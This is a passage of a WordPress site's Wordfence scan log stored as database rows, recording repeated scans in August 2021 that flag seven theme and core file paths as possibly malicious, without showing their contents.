so far'),(2668,1628855637.503979,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(2669,1628855639.481878,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(2670,1628855641.753668,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(2671,1628855644.999157,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(2672,1628855647.720200,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(2673,1628855655.424182,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(2674,1628855658.068676,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(2675,1628855660.849466,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(2676,1628855664.022688,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(2677,1628855672.843064,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(2678,1628855676.259724,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(2679,1628855678.801525,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(2680,1628855681.552629,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(2681,1628855686.058805,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(2682,1628855689.755289,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(2683,1628855692.854101,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(2684,1628855695.849299,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(2685,1628855698.244556,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(2686,1628855702.192473,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(2687,1628855705.200630,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(2688,1628855707.154159,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(2689,1628855710.743419,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(2690,1628855712.756424,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(2691,1628855715.192710,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(2692,1628855719.484603,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(2693,1628855723.000259,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(2694,1628855725.911708,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(2695,1628855728.190796,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(2696,1628855730.123901,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(2697,1628855734.578989,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(2698,1628855737.230489,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(2699,1628855741.345207,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(2700,1628855744.383076,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(2701,1628855746.631796,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(2702,1628855748.266066,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(2703,1628855751.525225,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(2704,1628855754.576862,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(2705,1628855757.361321,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(2706,1628855759.615577,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(2707,1628855764.319515,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(2708,1628855768.909147,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(2709,1628855772.210158,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(2710,1628855775.587532,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(2711,1628855778.526450,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(2712,1628855781.663934,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(2713,1628855786.125873,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(2714,1628855787.769910,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(2715,1628855791.949886,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(2716,1628855795.912545,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(2717,1628855798.726512,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(2718,1628855802.743326,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(2719,1628855805.639964,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(2720,1628855807.836883,2,'info','Analyzed 6600 files containing 97.78 MB of data so far'),(2721,1628855811.145804,2,'info','Analyzed 6700 files containing 98.6 MB of data so far'),(2722,1628855813.321582,2,'info','Analyzed 6800 files containing 99.52 MB of data so far'),(2723,1628855816.680963,2,'info','Analyzed 6900 files containing 101.55 MB of data so far'),(2724,1628855822.075702,2,'info','Analyzed 7000 files containing 103.88 MB of data so far'),(2725,1628855827.674987,2,'info','Analyzed 7100 files containing 105.3 MB of data so far'),(2726,1628855831.471692,2,'info','Analyzed 7200 files containing 114.81 MB of data so far'),(2727,1628855836.912376,2,'info','Analyzed 7300 files containing 120.22 MB of data so far'),(2728,1628855839.775564,2,'info','Analyzed 7400 files containing 121.61 MB of data so far'),(2729,1628855842.855835,2,'info','Analyzed 7500 files containing 123.98 MB of data so far'),(2730,1628855849.488161,2,'info','Analyzed 7600 files containing 128 MB of data so far'),(2731,1628855854.211446,2,'info','Analyzed 7700 files containing 129.72 MB of data so far'),(2732,1628855857.183113,2,'info','Analyzed 7800 files containing 131.29 MB of data so far'),(2733,1628855859.259618,2,'info','Analyzed 7831 files containing 131.71 MB of data.'),(2741,1628855860.912484,2,'info','Starting scan of file contents'),(2742,1628855861.986849,2,'info','Scanned contents of 37 additional files at 36.22 per second'),(2743,1628855863.030273,2,'info','Scanned contents of 63 additional files at 30.51 per second'),(2744,1628855864.069751,2,'info','Scanned contents of 95 additional files at 30.60 per second'),(2745,1628855865.081480,2,'info','Scanned contents of 133 additional files at 32.31 per second'),(2746,1628855867.027825,2,'info','Scanned contents of 169 additional files at 27.88 per second'),(2747,1628855868.058942,2,'info','Scanned contents of 190 additional files at 26.78 per second'),(2748,1628855868.436813,2,'info','Scanned contents of 201 additional files at 26.90 per second'),(2749,1628855868.438982,2,'info','Asking Wordfence to check URLs against malware list.'),(2750,1628855868.449558,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(2751,1628855869.228186,2,'info','Done host key check.'),(2752,1628855870.199219,2,'info','Done file contents scan'),(2753,1628855870.201769,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(2754,1628855870.206129,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(2755,1628855870.210023,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(2756,1628855870.222047,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(2757,1628855870.226213,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(2758,1628855870.230635,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(2759,1628855870.234815,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(2765,1628855870.957503,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2766,1628855870.962041,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(2767,1628855871.724497,2,'info','Done host key check.'),(2768,1628855871.748597,2,'info','Done examining URLs'),(2773,1628855872.115588,2,'info','Starting password strength check on 1 user.'),(2780,1628855876.320703,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2781,1628855876.322767,2,'info','Done examining URLs'),(2783,1628855876.414038,1,'info','-------------------'),(2784,1628855876.416180,2,'info','Wordfence used 22.83 MB of memory for scan. Server peak memory usage was: 42.83 MB'),(2785,1628855876.426226,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 5 minutes 9 seconds.'),(2788,1628937786.305884,1,'info','Initiating quick scan'),(2793,1628937787.049524,1,'info','-------------------'),(2794,1628937787.073487,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2795,1628937787.087106,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2798,1629024108.733911,1,'info','Initiating quick scan'),(2803,1629024109.544742,1,'info','-------------------'),(2804,1629024109.576725,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2805,1629024109.633464,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2808,1629110642.264758,1,'info','Initiating quick scan'),(2813,1629110642.817140,1,'info','-------------------'),(2814,1629110642.831198,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 6 MB'),(2815,1629110642.833974,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2817,1629114839.436064,1,'info','Scheduled Wordfence scan starting at Monday 16th of August 2021 11:53:59 AM'),(2819,1629114840.417326,1,'info','Contacting Wordfence to initiate scan'),(2826,1629114850.035277,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2827,1629114850.085503,2,'info','The disk has 3464457.53 MB available'),(2835,1629114850.369553,2,'info','Getting plugin list from WordPress'),(2836,1629114850.411148,2,'info','Found 4 plugins'),(2837,1629114850.422311,2,'info','Getting theme list from WordPress'),(2838,1629114850.501370,2,'info','Found 38 themes'),(2850,1629114854.146689,2,'info','500 files indexed'),(2851,1629114854.258165,2,'info','1000 files indexed'),(2852,1629114854.340365,2,'info','1500 files indexed'),(2853,1629114854.399564,2,'info','2000 files indexed'),(2854,1629114854.515003,2,'info','2500 files indexed'),(2855,1629114854.586311,2,'info','3000 files indexed'),(2856,1629114854.673358,2,'info','3500 files indexed'),(2857,1629114854.788094,2,'info','4000 files indexed'),(2858,1629114854.841943,2,'info','4500 files indexed'),(2859,1629114854.929162,2,'info','5000 files indexed'),(2860,1629114855.037372,2,'info','5500 files indexed'),(2861,1629114855.338903,2,'info','6000 files indexed'),(2862,1629114855.379964,2,'info','6500 files indexed'),(2863,1629114855.418294,2,'info','7000 files indexed'),(2864,1629114855.430859,2,'info','7500 files indexed'),(2865,1629114855.459165,2,'info','7831 files indexed'),(2866,1629114859.708748,2,'info','Analyzed 100 files containing 1.62 MB of data so far'),(2867,1629114862.205652,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(2868,1629114863.722325,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(2869,1629114867.500532,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(2870,1629114870.623750,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(2871,1629114876.160123,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2872,1629114879.956381,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(2873,1629114883.412121,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(2874,1629114887.029330,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(2875,1629114889.530821,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(2876,1629114894.453080,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(2877,1629114897.345058,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(2878,1629114900.299988,2,'info','Analyzed 1300 files containing 21.72 MB of data so far'),(2879,1629114902.714482,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(2880,1629114905.369499,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(2881,1629114909.822889,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(2882,1629114912.969799,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(2883,1629114915.038088,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(2884,1629114917.625190,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(2885,1629114920.558836,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(2886,1629114923.505668,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(2887,1629114927.647254,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(2888,1629114931.306908,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(2889,1629114933.931915,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(2890,1629114938.668533,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(2891,1629114942.796156,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(2892,1629114945.165012,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(2893,1629114948.104933,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(2894,1629114950.706449,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(2895,1629114952.839801,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(2896,1629114956.028649,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(2897,1629114959.169447,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(2898,1629114960.682437,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(2899,1629114962.233378,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(2900,1629114964.939034,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(2901,1629114966.993746,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(2902,1629114970.119379,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(2903,1629114971.827340,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(2904,1629114975.078835,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(2905,1629114977.324332,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(2906,1629114979.275946,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(2907,1629114982.305033,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(2908,1629114985.667108,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(2909,1629114988.502483,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(2910,1629114992.309883,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(2911,1629114996.367012,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(2912,1629114998.274034,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(2913,1629114999.805262,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(2914,1629115001.811169,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(2915,1629115003.007544,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(2916,1629115004.551259,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(2917,1629115007.031565,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(2918,1629115009.838598,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(2919,1629115013.513410,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(2920,1629115016.659048,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(2921,1629115018.964928,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(2922,1629115022.045095,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(2923,1629115024.122720,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(2924,1629115026.775868,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(2925,1629115028.710998,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(2926,1629115031.397758,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(2927,1629115034.988613,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(2928,1629115036.747888,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(2929,1629115041.214113,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(2930,1629115042.185116,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(2931,1629115044.399669,2,'info','Analyzed 6600 files containing 97.78 MB of data so far'),(2932,1629115047.266123,2,'info','Analyzed 6700 files containing 98.6 MB of data so far'),(2933,1629115051.127246,2,'info','Analyzed 6800 files containing 99.52 MB of data so far'),(2934,1629115053.962264,2,'info','Analyzed 6900 files containing 101.55 MB of data so far'),(2935,1629115058.471080,2,'info','Analyzed 7000 files containing 103.88 MB of data so far'),(2936,1629115062.568347,2,'info','Analyzed 7100 files containing 105.3 MB of data so far'),(2937,1629115065.992370,2,'info','Analyzed 7200 files containing 114.81 MB of data so far'),(2938,1629115069.039284,2,'info','Analyzed 7300 files containing 120.22 MB of data so far'),(2939,1629115073.023131,2,'info','Analyzed 7400 files containing 121.61 MB of data so far'),(2940,1629115075.612668,2,'info','Analyzed 7500 files containing 123.98 MB of data so far'),(2941,1629115078.029704,2,'info','Analyzed 7600 files containing 128 MB of data so far'),(2942,1629115081.009369,2,'info','Analyzed 7700 files containing 129.72 MB of data so far'),(2943,1629115085.773130,2,'info','Analyzed 7800 files containing 131.29 MB of data so far'),(2944,1629115087.506468,2,'info','Analyzed 7831 files containing 131.71 MB of data.'),(2952,1629115089.781261,2,'info','Starting scan of file contents'),(2953,1629115090.794582,2,'info','Scanned contents of 32 additional files at 31.99 per second'),(2954,1629115091.809202,2,'info','Scanned contents of 64 additional files at 31.76 per second'),(2955,1629115092.852539,2,'info','Scanned contents of 107 additional files at 34.99 per second'),(2956,1629115093.888815,2,'info','Scanned contents of 164 additional files at 40.05 per second'),(2957,1629115094.928996,2,'info','Scanned contents of 194 additional files at 37.78 per second'),(2958,1629115095.186553,2,'info','Scanned contents of 201 additional files at 37.28 per second'),(2959,1629115095.192384,2,'info','Asking Wordfence to check URLs against malware list.'),(2960,1629115095.200165,2,'info','Checking 357 host keys against Wordfence scanning servers.'),(2961,1629115095.955285,2,'info','Done host key check.'),(2962,1629115096.679104,2,'info','Done file contents scan'),(2963,1629115096.690471,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/rtl/index.php'),(2964,1629115096.712044,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/auberge/includes/plugins/smart-slider/smart-slider/index.php'),(2965,1629115096.733833,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/vars.php'),(2966,1629115096.755956,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/colors/ectoplasm/0.php'),(2967,1629115096.777924,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(2968,1629115096.801388,2,'info','Adding issue: File appears to be malicious or unsafe: wp-includes/class.wp-includes.php'),(2969,1629115096.823930,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/gambit/inc/widgets/roman.php'),(2975,1629115097.877669,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2976,1629115097.888571,2,'info','Checking 427 host keys against Wordfence scanning servers.'),(2977,1629115098.666389,2,'info','Done host key check.'),(2978,1629115098.677914,2,'info','Done examining URLs'),(2983,1629115100.013520,2,'info','Starting password strength check on 1 user.'),(2990,1629115106.565214,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2991,1629115106.567410,2,'info','Done examining URLs'),(2993,1629115106.641927,1,'info','-------------------'),(2994,1629115106.643981,2,'info','Wordfence used 19.25 MB of memory for scan. Server peak memory usage was: 39.25 MB'),(2995,1629115106.654069,1,'info','Scan Complete. Scanned 7831 files, 5 plugins, 38 themes, 82 posts, 0 comments and 823 URLs in 4 minutes 25 seconds.'),(2998,1629196509.982879,1,'info','Initiating quick scan'),(3003,1629196511.195932,1,'info','-------------------'),(3004,1629196511.281086,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 4 MB'),(3005,1629196511.327205,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3008,1629282885.903514,1,'info','Initiating quick scan'),(3013,1629282886.586718,1,'info','-------------------'),(3014,1629282886.607889,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 8 MB'),(3015,1629282886.618571,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3018,1629369453.477384,1,'info','Initiating quick scan'),(3023,1629369453.932060,1,'info','-------------------'),(3024,1629369453.944814,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3025,1629369453.947948,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3027,1629373878.342332,1,'info','Scheduled Wordfence scan starting at Thursday 19th of August 2021 11:51:18 AM'),(3029,1629373879.387989,1,'info','Contacting Wordfence to initiate scan'),(3036,1629373886.760514,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3037,1629373886.770686,2,'info','The disk has 3464294.7 MB available'),(3045,1629373886.955730,2,'info','Getting plugin list from WordPress'),(3046,1629373886.963463,2,'info','Found 4 plugins'),(3047,1629373886.965813,2,'info','Getting theme list from WordPress'),(3048,1629373886.996613,2,'info','Found 38 themes'),(3051,1629373889.512776,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3052,1629373889.583449,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3053,1629373889.642028,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3054,1629373889.663778,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3055,1629373889.734569,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3056,1629373889.787163,10,'info','SUM_DISABLED:Skipping theme scan'),(3057,1629373889.802165,10,'info','SUM_DISABLED:Skipping plugin scan'),(3058,1629373889.846647,10,'info','SUM_START:Scanning for known malware files'),(3059,1629373889.909097,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3060,1629373890.064574,2,'info','500 files indexed'),(3061,1629373890.190174,2,'info','1000 files indexed'),(3062,1629373890.436226,2,'info','1500 files indexed'),(3063,1629373890.586915,2,'info','2000 files indexed'),(3064,1629373890.788582,2,'info','2500 files indexed'),(3065,1629373891.019860,2,'info','3000 files indexed'),(3066,1629373891.146319,2,'info','3500 files indexed'),(3067,1629373891.558451,2,'info','4000 files indexed'),(3068,1629373891.703784,2,'info','4500 files indexed'),(3069,1629373891.925554,2,'info','5000 files indexed'),(3070,1629373892.136400,2,'info','5500 files indexed'),(3071,1629373892.485956,2,'info','6000 files indexed'),(3072,1629373892.527139,2,'info','6500 files indexed'),(3073,1629373892.615214,2,'info','7000 files indexed'),(3074,1629373892.698089,2,'info','7500 files indexed'),(3075,1629373892.788603,2,'info','7831 files indexed'),(3076,1629373901.031580,2,'info','Analyzed 100 files containing 1.62 MB of data so far'),(3077,1629373911.210235,2,'info','Analyzed 200 files containing 3.19 MB of data so far'),(3078,1629373921.796910,2,'info','Analyzed 300 files containing 4.47 MB of data so far'),(3079,1629373939.082105,2,'info','Analyzed 400 files containing 7.22 MB of data so far'),(3080,1629373952.450236,2,'info','Analyzed 500 files containing 8.08 MB of data so far'),(3081,1629373960.059776,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(3082,1629373968.324836,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(3083,1629373976.526400,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(3084,1629373986.080696,2,'info','Analyzed 900 files containing 12.84 MB of data so far'),(3085,1629373995.653643,2,'info','Analyzed 1000 files containing 18.32 MB of data so far'),(3086,1629374012.917285,2,'info','Analyzed 1100 files containing 19.82 MB of data so far'),(3087,1629374027.634632,2,'info','Analyzed 1200 files containing 21.03 MB of data so far'),(3088,1629374040.539996,2,'info','Analyzed 1300 files containing 21.72 MB of data so far'),(3089,1629374049.284344,2,'info','Analyzed 1400 files containing 22.66 MB of data so far'),(3090,1629374057.984191,2,'info','Analyzed 1500 files containing 22.69 MB of data so far'),(3091,1629374066.541096,2,'info','Analyzed 1600 files containing 22.72 MB of data so far'),(3092,1629374075.795986,2,'info','Analyzed 1700 files containing 24.07 MB of data so far'),(3093,1629374083.500150,2,'info','Analyzed 1800 files containing 24.71 MB of data so far'),(3094,1629374092.563754,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(3095,1629374101.257840,2,'info','Analyzed 2000 files containing 27.52 MB of data so far'),(3096,1629374110.567470,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(3097,1629374120.171790,2,'info','Analyzed 2200 files containing 29.56 MB of data so far'),(3098,1629374128.649530,2,'info','Analyzed 2300 files containing 31.12 MB of data so far'),(3099,1629374137.572293,2,'info','Analyzed 2400 files containing 32.04 MB of data so far'),(3100,1629374147.023607,2,'info','Analyzed 2500 files containing 33.9 MB of data so far'),(3101,1629374156.698788,2,'info','Analyzed 2600 files containing 35.1 MB of data so far'),(3102,1629374163.113911,2,'info','Analyzed 2700 files containing 36.94 MB of data so far'),(3103,1629374171.140677,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(3104,1629374181.873123,2,'info','Analyzed 2900 files containing 41.71 MB of data so far'),(3105,1629374193.956964,2,'info','Analyzed 3000 files containing 48.95 MB of data so far'),(3106,1629374208.712807,2,'info','Analyzed 3100 files containing 50.98 MB of data so far'),(3107,1629374219.736262,2,'info','Analyzed 3200 files containing 52.86 MB of data so far'),(3108,1629374226.014015,2,'info','Analyzed 3300 files containing 55.06 MB of data so far'),(3109,1629374232.282895,2,'info','Analyzed 3400 files containing 56.25 MB of data so far'),(3110,1629374237.759412,2,'info','Analyzed 3500 files containing 57.02 MB of data so far'),(3111,1629374244.314718,2,'info','Analyzed 3600 files containing 57.57 MB of data so far'),(3112,1629374251.130977,2,'info','Analyzed 3700 files containing 59.08 MB of data so far'),(3113,1629374259.178105,2,'info','Analyzed 3800 files containing 59.45 MB of data so far'),(3114,1629374264.790698,2,'info','Analyzed 3900 files containing 60.65 MB of data so far'),(3115,1629374270.362453,2,'info','Analyzed 4000 files containing 60.94 MB of data so far'),(3116,1629374276.059333,2,'info','Analyzed 4100 files containing 63.62 MB of data so far'),(3117,1629374283.067451,2,'info','Analyzed 4200 files containing 65.23 MB of data so far'),(3118,1629374289.917838,2,'info','Analyzed 4300 files containing 67.66 MB of data so far'),(3119,1629374298.496350,2,'info','Analyzed 4400 files containing 69.04 MB of data so far'),(3120,1629374304.360790,2,'info','Analyzed 4500 files containing 71.8 MB of data so far'),(3121,1629374312.390746,2,'info','Analyzed 4600 files containing 74.66 MB of data so far'),(3122,1629374323.726720,2,'info','Analyzed 4700 files containing 75.12 MB of data so far'),(3123,1629374333.804525,2,'info','Analyzed 4800 files containing 76.29 MB of data so far'),(3124,1629374340.899857,2,'info','Analyzed 4900 files containing 77.09 MB of data so far'),(3125,1629374348.252315,2,'info','Analyzed 5000 files containing 77.68 MB of data so far'),(3126,1629374355.180385,2,'info','Analyzed 5100 files containing 78.71 MB of data so far'),(3127,1629374362.250260,2,'info','Analyzed 5200 files containing 79.65 MB of data so far'),(3128,1629374368.608525,2,'info','Analyzed 5300 files containing 80.65 MB of data so far'),(3129,1629374376.447421,2,'info','Analyzed 5400 files containing 85.1 MB of data so far'),(3130,1629374383.519076,2,'info','Analyzed 5500 files containing 85.42 MB of data so far'),(3131,1629374391.316679,2,'info','Analyzed 5600 files containing 86.54 MB of data so far'),(3132,1629374402.131649,2,'info','Analyzed 5700 files containing 87.47 MB of data so far'),(3133,1629374416.076834,2,'info','Analyzed 5800 files containing 89.54 MB of data so far'),(3134,1629374423.247802,2,'info','Analyzed 5900 files containing 89.94 MB of data so far'),(3135,1629374430.658153,2,'info','Analyzed 6000 files containing 91.06 MB of data so far'),(3136,1629374438.397315,2,'info','Analyzed 6100 files containing 91.87 MB of data so far'),(3137,1629374447.406099,2,'info','Analyzed 6200 files containing 92.48 MB of data so far'),(3138,1629374459.619589,2,'info','Analyzed 6300 files containing 92.83 MB of data so far'),(3139,1629374468.111858,2,'info','Analyzed 6400 files containing 93.98 MB of data so far'),(3140,1629374474.141084,2,'info','Analyzed 6500 files containing 94.31 MB of data so far'),(3141,1629374486.270494,2,'info','Analyzed 6600 files containing 97.79 MB of data so far'),(3142,1629374493.354586,2,'info','Analyzed 6700 files containing 98.61 MB of data so far'),(3143,1629374501.755070,2,'info','Analyzed 6800 files containing 99.53 MB of data so far'),(3144,1629374508.373693,2,'info','Analyzed 6900 files containing 101.56 MB of data so far'),(3145,1629374519.018246,2,'info','Analyzed 7000 files containing 103.9 MB of data so far'),(3146,1629374524.751322,2,'info','Analyzed 7100 files containing 105.31 MB of data so far'),(3147,1629374536.132865,2,'info','Analyzed 7200 files containing 114.82 MB of data so far'),(3148,1629374545.472052,2,'info','Analyzed 7300 files containing 120.23 MB of data so far'),(3149,1629374558.156386,2,'info','Analyzed 7400 files containing 121.62 MB of data so far'),(3150,1629374565.994403,2,'info','Analyzed 7500 files containing 123.99 MB of data so far'),(3151,1629374574.076178,2,'info','Analyzed 7600 files containing 128.01 MB of data so far'),(3152,1629374580.661681,2,'info','Analyzed 7700 files containing 129.74 MB of data so far'),(3153,1629374593.087701,2,'info','Analyzed 7800 files containing 131.3 MB of data so far'),(3154,1629374596.337268,2,'info','Analyzed 7831 files containing 131.72 MB of data.'),(3155,1629374596.358330,10,'info','SUM_ENDBAD:Comparing core WordPress files against originals in repository'),(3156,1629374596.424370,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3157,1629374596.490374,10,'info','SUM_ENDOK:Scanning for known malware files'),(3158,1629374596.585262,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3159,1629374596.635471,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3160,1629374596.775978,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3161,1629374596.819111,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3162,1629374598.442281,2,'info','Starting scan of file contents'),(3163,1629374599.467276,2,'info','Scanned contents of 15 additional files at 14.85 per second'),(3164,1629374601.215499,2,'info','Scanned contents of 25 additional files at 9.06 per second'),(3165,1629374602.266942,2,'info','Scanned contents of 41 additional files at 10.76 per second'),(3166,1629374603.321945,2,'info','Scanned contents of 57 additional files at 11.72 